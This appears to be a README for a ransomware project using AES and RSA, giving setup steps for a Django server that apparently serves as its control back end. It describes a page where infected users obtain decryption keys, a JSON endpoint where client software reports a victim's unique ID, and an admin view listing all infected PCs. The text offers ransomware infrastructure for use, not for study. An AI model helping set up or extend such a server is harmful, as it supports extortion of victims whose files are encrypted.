A implementation of ransomware using AES+RSA as encryption algorithm.
- download and install python and pip
- RUN: pip install virtualenv
- RUN: virtualenv venv
- RUN: ./venv/Scripts/activate.ps1
- RUN: pip install -r requirements.txt
- RUN: python ./manage.py runserver
Now the server is available on localhost:8000
Page for infected user to obtain decryption key
Page for client software to do json http post in the following format
{ "uniqueId": "<put unique id here>" }
A small admin interface. A account for this can be created by running ./manage.py createsuperuser
This prints an overview of all infected PCs. This endpoint only works if you are logged in as superuser.